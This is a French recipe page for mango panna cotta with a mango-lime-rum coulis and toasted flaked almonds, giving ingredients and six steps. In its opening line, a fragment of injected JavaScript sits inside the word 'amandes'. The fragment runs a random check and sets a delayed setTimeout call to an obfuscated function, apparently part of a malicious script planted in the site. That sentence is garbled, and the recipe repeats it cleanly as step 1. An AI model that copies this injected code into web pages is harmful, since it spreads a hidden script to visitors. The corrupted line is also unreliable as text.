Panna cotta à la mangue
2018-01-03- Niveau : Facile
Dans une poêle sans matière grasse, faites griller les amandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andes effilées pendant quelques minutes sans s’arrêter de remuer avec une spatule en bois. Réservez.
Ingrédients
- Pour 4 personnes
- 40 cl de crème fleurette
- 60 g de sucre en poudre
- 1 sachet de sucre vanillé
- 2 feuilles de gélatine
- Pour le coulis
- 50 g de chair de mangue fraîche ou surgelé
- 1 jus de citron vert
- 20 g de cassonade
- 1 cuillère à soupe de rhum ambré
- 50 g d'amandes effilées
Préparation de la recette
Etape 1
Dans une poêle sans matière grasse, faites griller les amandes effilées pendant quelques minutes sans s'arrêter de remuer avec une spatule en bois. Réservez.
Etape 2
Mixez la chair de la mangue avec le jus du citron vert, le rhum, et la cassonade.
Etape 3
Versez cette purée dans des ramequins. Et réservez au congélateur. Plongez les feuilles de gélatine dans l'eau froide pendant 20 minutes.
Etape 4
Dans une casserole mélangez le sucre en poudre, le sucre vanillé avec la crème fleurette, tout en remuant. Portez à ébullition et retirez du feu.
Etape 5
Après quelques secondes de refroidissement incorporez les feuilles de gélatine essorée tout en remuant jusqu'à la dissolution de celle-ci. Laissez refroidir à température ambiante.
Etape 6
Versez la crème dans des ramequins. Placez au réfrigérateur pendant 30 minutes. Dégustez la panna cotta à la mangue avec les amandes effilées. Dégustez.
Note des membres
(0 / 5)
0 personne(s) ont noté cette recette